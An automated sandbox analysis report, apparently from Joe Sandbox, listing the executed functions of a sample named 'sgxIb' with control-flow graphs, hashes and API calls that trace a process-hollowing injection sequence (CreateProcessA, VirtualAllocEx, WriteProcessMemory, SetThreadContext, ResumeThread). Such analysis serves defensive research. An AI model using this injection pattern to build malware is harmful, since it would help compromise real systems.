28864->28866 28867 7012ff8 ResumeThread 28864->28867 28865 7015518 28865->28784 28866->28865 28867->28865 28869 7012ff8 ResumeThread 28868->28869 28871 7013069 28869->28871 28871->28860 28873 7013038 ResumeThread 28872->28873 28875 7013069 28873->28875 28875->28860 28620 b7e930 DuplicateHandle 28621 b7e9c6 28620->28621 28626 b7e2e0 28627 b7e326 GetCurrentProcess 28626->28627 28629 b7e371 28627->28629 28630 b7e378 GetCurrentThread 28627->28630 28629->28630 28631 b7e3b5 GetCurrentProcess 28630->28631 28632 b7e3ae 28630->28632 28633 b7e3eb GetCurrentThreadId 28631->28633 28632->28631 28635 b7e444 28633->28635 28636 5a101b8 28638 5a101f2 28636->28638 28637 5a10283 28638->28637 28642 5a102a0 28638->28642 28647 5a102b0 28638->28647 28639 5a10279 28643 5a102de 28642->28643 28644 5a10735 28642->28644 28643->28644 28652 5a10bc8 28643->28652 28660 5a10bd8 28643->28660 28644->28639 28648 5a10735 28647->28648 28649 5a102de 28647->28649 28648->28639 28649->28648 28650 5a10bc8 2 API calls 28649->28650 28651 5a10bd8 2 API calls 28649->28651 28650->28648 28651->28648 28653 5a10bd8 28652->28653 28658 5a10bc8 CreateIconFromResourceEx 28653->28658 28659 5a10bd8 CreateIconFromResourceEx 28653->28659 28654 5a10bf2 28655 5a10bff 28654->28655 28656 5a10c17 CreateIconFromResourceEx 28654->28656 28655->28644 28657 5a10ca6 28656->28657 28657->28644 28658->28654 28659->28654 28665 5a10bc8 CreateIconFromResourceEx 28660->28665 28666 5a10bd8 CreateIconFromResourceEx 28660->28666 28661 5a10bf2 28662 5a10bff 28661->28662 28663 5a10c17 CreateIconFromResourceEx 28661->28663 28662->28644 28664 5a10ca6 28663->28664 28664->28644 28665->28661 28666->28661 28667 70181d8 28668 7018200 28667->28668 28669 70181f6 28667->28669 28671 701822b 28669->28671 28672 701823a 28671->28672 28673 7018268 28672->28673 28675 b7ff30 CloseHandle 28672->28675 28673->28668 28676 b7ff97 28675->28676 28676->28673 28622 b7c238 28623 b7c280 GetModuleHandleW 28622->28623 28624 b7c27a 28622->28624 28625 b7c2ad 28623->28625 28624->28623 28677 b74668 28678 b7467a 28677->28678 28679 b74686 28678->28679 28681 b74781 28678->28681 28682 b74795 28681->28682 28685 b74880 28682->28685 28686 b748a7 28685->28686 28687 b74984 28686->28687 28689 b744e4 28686->28689 28690 b75910 CreateActCtxA 28689->28690 28692 b759d3 28690->28692 28692->28692

                                                                                                            Executed Functions

                                                                                                            Function 00B7E2E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 705 b7e2e0-b7e36f GetCurrentProcess 709 b7e371-b7e377 705->709 710 b7e378-b7e3ac GetCurrentThread 705->710 709->710 711 b7e3b5-b7e3e9 GetCurrentProcess 710->711 712 b7e3ae-b7e3b4 710->712 714 b7e3f2-b7e40a 711->714 715 b7e3eb-b7e3f1 711->715 712->711 717 b7e413-b7e442 GetCurrentThreadId 714->717 715->714 719 b7e444-b7e44a 717->719 720 b7e44b-b7e4ad 717->720 719->720
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00B7E35E
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00B7E39B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00B7E3D8
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00B7E431
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 63e1cbbb787122f8ba45aad8c54775fc9b789c4191c2bacf2174e7721806798a
                                                                                                            • Instruction ID: 1220e3bcec9bd9363ceb576335ce859427d5202677971c4c90392de7cd731961
                                                                                                            • Opcode Fuzzy Hash: 63e1cbbb787122f8ba45aad8c54775fc9b789c4191c2bacf2174e7721806798a
                                                                                                            • Instruction Fuzzy Hash: 285136B09003098FDB14DFAAD548B9EBBF1EF88314F21C599E429A7390D774A944CB66
                                                                                                            Function 070134BC Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 869 70134bc-701355d 872 7013596-70135b6 869->872 873 701355f-7013569 869->873 878 70135b8-70135c2 872->878 879 70135ef-701361e 872->879 873->872 874 701356b-701356d 873->874 876 7013590-7013593 874->876 877 701356f-7013579 874->877 876->872 880 701357b 877->880 881 701357d-701358c 877->881 878->879 882 70135c4-70135c6 878->882 889 7013620-701362a 879->889 890 7013657-7013711 CreateProcessA 879->890 880->881 881->881 883 701358e 881->883 884 70135e9-70135ec 882->884 885 70135c8-70135d2 882->885 883->876 884->879 887 70135d4 885->887 888 70135d6-70135e5 885->888 887->888 888->888 891 70135e7 888->891 889->890 892 701362c-701362e 889->892 901 7013713-7013719 890->901 902 701371a-70137a0 890->902 891->884 893 7013651-7013654 892->893 894 7013630-701363a 892->894 893->890 896 701363c 894->896 897 701363e-701364d 894->897 896->897 897->897 898 701364f 897->898 898->893 901->902 912 70137b0-70137b4 902->912 913 70137a2-70137a6 902->913 914 70137c4-70137c8 912->914 915 70137b6-70137ba 912->915 913->912 916 70137a8 913->916 918 70137d8-70137dc 914->918 919 70137ca-70137ce 914->919 915->914 917 70137bc 915->917 916->912 917->914 921 70137ee-70137f5 918->921 922 70137de-70137e4 918->922 919->918 920 70137d0 919->920 920->918 923 70137f7-7013806 921->923 924 701380c 921->924 922->921 923->924 925 701380d 924->925 925->925
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070136FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: d77a49a19e5191dd75fdf37818e1895b64a9c8bb21878df7a92f829cfd558ca6
                                                                                                            • Instruction ID: e2a739990959dab474b8622a83bd6f1d0d194f4f8bb2b28f2fbed24c37338473
                                                                                                            • Opcode Fuzzy Hash: d77a49a19e5191dd75fdf37818e1895b64a9c8bb21878df7a92f829cfd558ca6
                                                                                                            • Instruction Fuzzy Hash: 88A139B1D0021A9FDB24CF68C8417DEFBF2BF48314F1486A9E819A7240DB749985CF92
                                                                                                            Function 070134C8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 927 70134c8-701355d 929 7013596-70135b6 927->929 930 701355f-7013569 927->930 935 70135b8-70135c2 929->935 936 70135ef-701361e 929->936 930->929 931 701356b-701356d 930->931 933 7013590-7013593 931->933 934 701356f-7013579 931->934 933->929 937 701357b 934->937 938 701357d-701358c 934->938 935->936 939 70135c4-70135c6 935->939 946 7013620-701362a 936->946 947 7013657-7013711 CreateProcessA 936->947 937->938 938->938 940 701358e 938->940 941 70135e9-70135ec 939->941 942 70135c8-70135d2 939->942 940->933 941->936 944 70135d4 942->944 945 70135d6-70135e5 942->945 944->945 945->945 948 70135e7 945->948 946->947 949 701362c-701362e 946->949 958 7013713-7013719 947->958 959 701371a-70137a0 947->959 948->941 950 7013651-7013654 949->950 951 7013630-701363a 949->951 950->947 953 701363c 951->953 954 701363e-701364d 951->954 953->954 954->954 955 701364f 954->955 955->950 958->959 969 70137b0-70137b4 959->969 970 70137a2-70137a6 959->970 971 70137c4-70137c8 969->971 972 70137b6-70137ba 969->972 970->969 973 70137a8 970->973 975 70137d8-70137dc 971->975 976 70137ca-70137ce 971->976 972->971 974 70137bc 972->974 973->969 974->971 978 70137ee-70137f5 975->978 979 70137de-70137e4 975->979 976->975 977 70137d0 976->977 977->975 980 70137f7-7013806 978->980 981 701380c 978->981 979->978 980->981 982 701380d 981->982 982->982
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070136FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 96a1c3fb2a88e6ec8372cd85ec26293e4dcf4ddcc6deb46be9cfe726e790267c
                                                                                                            • Instruction ID: dfcb59b8529c1e59f2c367c716eee0204d95ec6ffcd9c1348c9204654fd137f4
                                                                                                            • Opcode Fuzzy Hash: 96a1c3fb2a88e6ec8372cd85ec26293e4dcf4ddcc6deb46be9cfe726e790267c
                                                                                                            • Instruction Fuzzy Hash: 849139B1D0021A9FDB24CF68C8417DDFBF2BF49314F1486A9E819A7240DB759985CF92
                                                                                                            Function 00B75A7C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1092 b75a7c-b75b0c
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ec133e627cf2b8fa549abb960293f623d0a8c7cc4b71b32e6bc110b899338c7
                                                                                                            • Instruction ID: a86248a84b02799a26ca57ba2a79cc314b90982c416e10e3f2cef110afd4f8ee
                                                                                                            • Opcode Fuzzy Hash: 4ec133e627cf2b8fa549abb960293f623d0a8c7cc4b71b32e6bc110b899338c7
                                                                                                            • Instruction Fuzzy Hash: 14319CB1804B88CFDF21DFA8C8857DEBBF0EF55324F208299C5696B251C7B1A949CB41
                                                                                                            Function 00B744E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1095 b744e4-b759d1 CreateActCtxA 1099 b759d3-b759d9 1095->1099 1100 b759da-b75a34 1095->1100 1099->1100 1107 b75a36-b75a39 1100->1107 1108 b75a43-b75a47 1100->1108 1107->1108 1109 b75a49-b75a55 1108->1109 1110 b75a58 1108->1110 1109->1110 1112 b75a59 1110->1112 1112->1112
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00B759C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 94c4a8737e46133cc0a1538862f48333b7f309892ad77a26f98c7cbac36bb073
                                                                                                            • Instruction ID: 1db9e793ed363caf75199b2d100c358559064f34933740b91207750c3e3d96ba
                                                                                                            • Opcode Fuzzy Hash: 94c4a8737e46133cc0a1538862f48333b7f309892ad77a26f98c7cbac36bb073
                                                                                                            • Instruction Fuzzy Hash: 0D41D1B0C0071DCBDB24DFA9C884B9EBBF5BF48314F24816AD419AB251DBB56949CF90
                                                                                                            Function 00B7590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1113 b7590d-b75984 1115 b75987-b759d1 CreateActCtxA 1113->1115 1117 b759d3-b759d9 1115->1117 1118 b759da-b75a34 1115->1118 1117->1118 1125 b75a36-b75a39 1118->1125 1126 b75a43-b75a47 1118->1126 1125->1126 1127 b75a49-b75a55 1126->1127 1128 b75a58 1126->1128 1127->1128 1130 b75a59 1128->1130 1130->1130
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00B759C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 41c18f4b132bf92762c5e99c103eb1855f0c99f19599dbc7d802b7afa2a1005d
                                                                                                            • Instruction ID: cf4550232bb8e4b2a410ef08e27b6bf937edb80f7f87071d6e84552d599d3308
                                                                                                            • Opcode Fuzzy Hash: 41c18f4b132bf92762c5e99c103eb1855f0c99f19599dbc7d802b7afa2a1005d
                                                                                                            • Instruction Fuzzy Hash: 0F41E2B0C0071DCEDB24DFA9C884B9EBBF5BF48314F20816AD519AB251DBB56949CF90
                                                                                                            Function 05A10BD8 Relevance: 1.6, APIs: 1, Instructions: 83windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 05A10C97
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1808586498.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_5a10000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFromIconResource
                                                                                                            • String ID:
                                                                                                            • API String ID: 3668623891-0
                                                                                                            • Opcode ID: d03e871097d57fe7ff2a445f0d70daf41bcea0d74472c318655f941c0e762484
                                                                                                            • Instruction ID: fe3bff196e8456b9467304c83084d4d013bc0e203f677327b00f207e683da736
                                                                                                            • Opcode Fuzzy Hash: d03e871097d57fe7ff2a445f0d70daf41bcea0d74472c318655f941c0e762484
                                                                                                            • Instruction Fuzzy Hash: 003178729043499FCB11DFA9C944AEABFF9FF09310F14845AE954A7261C335A864DFA0
                                                                                                            Function 07013238 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070132D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: ad36542c31e756dd4e634a85b73f75c257809387e3df3f2e197ec59ddb5fec74
                                                                                                            • Instruction ID: 88a08617e27ddaa1df31d9382ecdc5b5b73f60192b85a52ff47077e02dccb25b
                                                                                                            • Opcode Fuzzy Hash: ad36542c31e756dd4e634a85b73f75c257809387e3df3f2e197ec59ddb5fec74
                                                                                                            • Instruction Fuzzy Hash: 642155B5D003199FDB10DFA9C885BEEBBF1FF48320F10882AE919A7240D7789954CB64
                                                                                                            Function 07013240 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070132D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 40c8ecf1afa11f737b1d29d867895c0177805abe7b1dbd63e28db0bf3aa30e8f
                                                                                                            • Instruction ID: 2aff724180a856add4157c7cc4dd02f72fb0a707614eda54302b06d7bd502325
                                                                                                            • Opcode Fuzzy Hash: 40c8ecf1afa11f737b1d29d867895c0177805abe7b1dbd63e28db0bf3aa30e8f
                                                                                                            • Instruction Fuzzy Hash: 59214AB19003599FDB10DFAAC885BDEFBF5FF48320F108429E919A7240C7789954CBA4
                                                                                                            Function 070130A1 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07013126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: c15ffe839ada0b8674226aff79c070dc3757fdfd4651306a6aa3676a4990166e
                                                                                                            • Instruction ID: 4a6d8cd11635d263cface8d5e617248613035fef88b43a4c2a62b19ab18ab56b
                                                                                                            • Opcode Fuzzy Hash: c15ffe839ada0b8674226aff79c070dc3757fdfd4651306a6aa3676a4990166e
                                                                                                            • Instruction Fuzzy Hash: 022139B19003099FDB10DFAAC4857EEFBF4EB48320F158429D459A7341D778A944CBA4
                                                                                                            Function 07013328 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070133B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 47f60ab12b5a175c8cba574d503eb027fd3372bb94833810e673f1896fa54a37
                                                                                                            • Instruction ID: b70dd877e04f70e3162922fcf73239943d540b54fe904b6bd8663ea518afc929
                                                                                                            • Opcode Fuzzy Hash: 47f60ab12b5a175c8cba574d503eb027fd3372bb94833810e673f1896fa54a37
                                                                                                            • Instruction Fuzzy Hash: 3F2139B1D003199FDB10DFA9C845AEEFBF5FF48320F14882AE519A7240D7389545DBA5
                                                                                                            Function 07013330 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070133B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 80204ad78da9fd31dd21a768c60bcb1479b973a57e41a2a1b476388cee59f2f7
                                                                                                            • Instruction ID: 6be7ec2c05bdaa7449b451d1025d6b3107111424b71e8456631e420c553df349
                                                                                                            • Opcode Fuzzy Hash: 80204ad78da9fd31dd21a768c60bcb1479b973a57e41a2a1b476388cee59f2f7
                                                                                                            • Instruction Fuzzy Hash: 992139B1C003599FCB10DFAAC845ADEFBF5FF48320F10842AE519A7240C738A944DBA4
                                                                                                            Function 070130A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07013126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 55b99e9df15a3c850af3e7ba67929bcec3fd6f907d3d61af6d1195050551c77f
                                                                                                            • Instruction ID: 6264d5a700290c1b945fa9a8ae776f90262238494990599581edea63525ac5c3
                                                                                                            • Opcode Fuzzy Hash: 55b99e9df15a3c850af3e7ba67929bcec3fd6f907d3d61af6d1195050551c77f
                                                                                                            • Instruction Fuzzy Hash: 202137B19003098FDB10DFAAC4857EEFBF4EB88320F158429D419A7241CB78A944CBA4
                                                                                                            Function 00B7E930 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B7E9B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 454abd8409f420c36969e4a360e508167312a80f2b3928999da4e403c4d1fba7
                                                                                                            • Instruction ID: 11296aea4982807c670070c39357dde7e771a776b95f1bab6bc641b0d31bb081
                                                                                                            • Opcode Fuzzy Hash: 454abd8409f420c36969e4a360e508167312a80f2b3928999da4e403c4d1fba7
                                                                                                            • Instruction Fuzzy Hash: 8121E4B59002089FDB10CFAAD984ADEBBF5EB48310F14845AE918A3350D374A944CFA4
                                                                                                            Function 07013178 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070131EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 56427242e626a5aa01357239b8276fce93b46fea86e16e9ca1abd6e814b9b72f
                                                                                                            • Instruction ID: e0cbae1eb6be539f27ec32a8cff6b6d596e44456ffec4661bf0f91e7f0de7b90
                                                                                                            • Opcode Fuzzy Hash: 56427242e626a5aa01357239b8276fce93b46fea86e16e9ca1abd6e814b9b72f
                                                                                                            • Instruction Fuzzy Hash: A2116AB19042498FCB10DFA9C845AEFFFF5EF88320F148419E559A7250CB359944DFA0
                                                                                                            Function 07013180 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070131EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 8d744a36796bfbf82ba2f5336e0cd68dd60d4119c68c26dce99dc5699f559472
                                                                                                            • Instruction ID: 67c0929906f9057f0fba076d48d0ca6e929b23d45bd731fd4660b56317aec18f
                                                                                                            • Opcode Fuzzy Hash: 8d744a36796bfbf82ba2f5336e0cd68dd60d4119c68c26dce99dc5699f559472
                                                                                                            • Instruction Fuzzy Hash: 8F1137B19002499FCB10DFAAC845ADFFFF5EF88320F148819E519A7250C775A954CFA4
                                                                                                            Function 07012FF0 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 03817b56387a9e640035cea74814c91d95a1d64889e2a39be8a230919db4db7b
                                                                                                            • Instruction ID: 18b382fe3cbb27350301e07ed0f23f170c35ef434dd2207e1a2d27342c28609d
                                                                                                            • Opcode Fuzzy Hash: 03817b56387a9e640035cea74814c91d95a1d64889e2a39be8a230919db4db7b
                                                                                                            • Instruction Fuzzy Hash: 8E1128B19003498FDB10DFAAC8457DFFBF5EB88324F248519D519A7280CB79A944CFA4
                                                                                                            Function 07012FF8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: f4b523639ba4539e8686c26f87c9a8fbe8288d2345b8f2dc16ba1c69bd0108be
                                                                                                            • Instruction ID: 1067c18bb336f99c08d5427963ccb723165a689436af8b5457458feb5b7f04b1
                                                                                                            • Opcode Fuzzy Hash: f4b523639ba4539e8686c26f87c9a8fbe8288d2345b8f2dc16ba1c69bd0108be
                                                                                                            • Instruction Fuzzy Hash: A81136B19003498FDB20DFAAC4457DFFBF5EB88324F248819D519A7240CB79A944CFA4
                                                                                                            Function 00B7C238 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00B7C29E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 43c31accbd1aafc2a510f7f6dd41340fe33cb51bb403930081828782d0e9e9f4
                                                                                                            • Instruction ID: 065474dc6ddaa259f0327d74b6b1df1b0758f532473a6896f48e06ad9e8e7480
                                                                                                            • Opcode Fuzzy Hash: 43c31accbd1aafc2a510f7f6dd41340fe33cb51bb403930081828782d0e9e9f4
                                                                                                            • Instruction Fuzzy Hash: B811E0B6C003498FDB10DF9AC444ADEFBF4EB88324F15845ED829A7211D379A545CFA5
                                                                                                            Function 070157E8 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0701584D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 7b4d181dd6192b8a67e99b236c3f2a4b63c581d12c6bd5381136d9c974d25c15
                                                                                                            • Instruction ID: 21dad22b0b55e44d9172f63430338a431200614ee6a9bff7390d8046a089ca31
